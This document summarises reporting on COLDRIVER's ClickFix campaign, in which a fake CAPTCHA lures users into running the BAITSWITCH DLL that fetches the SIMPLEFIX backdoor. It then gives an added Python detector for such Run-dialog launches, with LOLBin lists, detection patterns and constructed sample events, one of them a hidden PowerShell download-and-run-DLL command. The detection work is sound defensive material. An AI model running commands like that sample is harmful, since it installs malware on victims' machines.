
"COLDRIVER, also tracked as Callisto, Star Blizzard, and UNC4057, is the moniker assigned to a Russia-linked threat actor that's known to target a wide range of sectors since 2019. While early campaign waves were observed using spear-phishing lures to direct targets to credential harvesting pages, the group has been fleshing out its arsenal with custom tools like SPICA and LOSTKEYS, which underscores its technical sophistication."
"The adversary's use of ClickFix tactics was previously documented by the Google Threat Intelligence Group (GTIG) back in May 2025, using fake sites serving fake CAPTCHA verification prompts to trick the victim into executing a PowerShell command that's designed to deliver the LOSTKEYS Visual Basic Script. "The continued use of ClickFix suggests that it is an effective infection vector, even if it is neither novel nor technically advanced," Zscaler security researchers Sudeep Singh and Yin Hong Chang said in a report published this week."
"The latest attack chain follows the same modus operandi, tricking unsuspecting users into running a malicious DLL in the Windows Run dialog under the guise of completing a CAPTCHA check. The DLL, BAITSWITCH, reaches out to an attacker-controlled domain ("captchanom[.]top") to fetch the SIMPLEFIX backdoor, while a decoy document hosted on Google Drive is presented to the victims."
COLDRIVER conducted a multi-stage ClickFix-style campaign built around two tools, BAITSWITCH and SIMPLEFIX. BAITSWITCH is a downloader DLL that retrieves the SIMPLEFIX PowerShell backdoor from an attacker-controlled domain; the lure is a fake CAPTCHA prompt that talks the user into running the DLL through the Windows Run dialog, while a decoy document hosted on Google Drive is presented to the victim. The malware then uses HTTP requests to exfiltrate system information, receive commands that establish persistence, and store encrypted payloads in the Windows Registry. COLDRIVER has steadily expanded its toolkit since 2019, adding custom tools such as SPICA and LOSTKEYS, a sign of growing technical capability.
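The infection step described above (a user pastes a command into the Windows Run dialog, which launches a DLL that fetches the next stage) leaves a recognisable parent/child trace in process-creation telemetry. The following is an added detection example, not code from The Hacker News article or the Zscaler report. It assumes two things the page does not state: that Run-dialog launches appear as children of explorer.exe, and that the BAITSWITCH DLL is invoked via rundll32.exe. The event records it scores are constructed samples.

```python
"""Added example: flag ClickFix-style Run-dialog launches in Sysmon-like
process-creation records. Not code from the article or the Zscaler report.

Assumptions (not stated on the page): Win+R spawns its child under
explorer.exe, and the BAITSWITCH DLL is run through rundll32.exe.
SAMPLE_EVENTS below are constructed for illustration only."""
import re
from dataclasses import dataclass

# Binaries a pasted Run-dialog one-liner typically relies on.
RUN_DIALOG_LOLBINS = {
    "rundll32.exe", "regsvr32.exe", "mshta.exe", "powershell.exe",
    "pwsh.exe", "cmd.exe", "curl.exe", "certutil.exe", "msiexec.exe",
}
# Locations a freshly downloaded payload usually lands in.
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\"
    r"|\\programdata\\|\\temp\\", re.I)
REMOTE = re.compile(r"https?://|\\\\[\w.-]+\\", re.I)   # URL or UNC path
LURE = re.compile(r"not a robot|captcha|verif", re.I)  # generic ClickFix lure text


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def clickfix_indicators(ev: ProcessEvent) -> list[str]:
    """Return the reasons an event looks like a Run-dialog ClickFix launch."""
    if _basename(ev.parent_image) != "explorer.exe":
        return []  # assumption: Run-dialog children are spawned by explorer.exe
    child = _basename(ev.image)
    if child not in RUN_DIALOG_LOLBINS:
        return []
    reasons = [f"explorer.exe spawned {child}"]
    cmd = ev.command_line
    # A DLL handed to rundll32/regsvr32 from outside C:\Windows matches the
    # "run a malicious DLL" step; shell32.dll,Control_RunDLL launches do not.
    dll = re.search(r'"?([a-z]:\\[^",]+\.dll)', cmd, re.I)
    if child in ("rundll32.exe", "regsvr32.exe") and dll and \
            not dll.group(1).lower().startswith("c:\\windows\\"):
        reasons.append("DLL outside C:\\Windows invoked via rundll32/regsvr32")
    if USER_WRITABLE.search(cmd):
        reasons.append("payload path in user-writable directory")
    if REMOTE.search(cmd):
        reasons.append("remote URL or UNC path in command line")
    if LURE.search(cmd):
        reasons.append("CAPTCHA/verification lure text in command line")
    return reasons


def is_clickfix_like(ev: ProcessEvent) -> bool:
    # Require the launch chain plus at least one content indicator, so a
    # legitimate explorer.exe -> rundll32.exe control-panel launch is not flagged.
    return len(clickfix_indicators(ev)) >= 2


def triage(events):
    """Return (event, reasons) for every event that scores as ClickFix-like."""
    return [(ev, clickfix_indicators(ev)) for ev in events if is_clickfix_like(ev)]


EXPLORER = r"C:\Windows\explorer.exe"
SYS32 = r"C:\Windows\System32"
SAMPLE_EVENTS = [  # constructed, not real telemetry
    ProcessEvent(EXPLORER, SYS32 + r"\rundll32.exe",
                 r'rundll32.exe "C:\Users\alice\AppData\Local\Temp\verify.dll",Verify # I am not a robot'),
    ProcessEvent(EXPLORER, SYS32 + r"\notepad.exe",
                 r"notepad.exe C:\Users\alice\Documents\notes.txt"),
    ProcessEvent(SYS32 + r"\svchost.exe", SYS32 + r"\rundll32.exe",
                 r"rundll32.exe C:\Users\alice\AppData\Local\Temp\x.dll,Run"),
    ProcessEvent(EXPLORER, SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -w hidden -c "iwr https://example.invalid/check -OutFile $env:TEMP\c.dll; rundll32 $env:TEMP\c.dll,Verify"'),
    ProcessEvent(EXPLORER, SYS32 + r"\rundll32.exe",
                 r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
    ProcessEvent(EXPLORER, SYS32 + r"\cmd.exe", r"cmd.exe /c ipconfig /all"),
]

if __name__ == "__main__":
    for ev, reasons in triage(SAMPLE_EVENTS):
        print(ev.command_line)
        for r in reasons:
            print("  -", r)
```

The parent-process check is what separates a Run-dialog launch from the same LOLBin started by a service or a scheduled task, and the two-indicator threshold keeps ordinary explorer.exe-to-rundll32.exe control-panel launches out of the alert queue. In a real deployment the indicator list would be tuned to the environment and the parent-process assumption verified against the endpoint sensor's own telemetry.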
Read at The Hacker News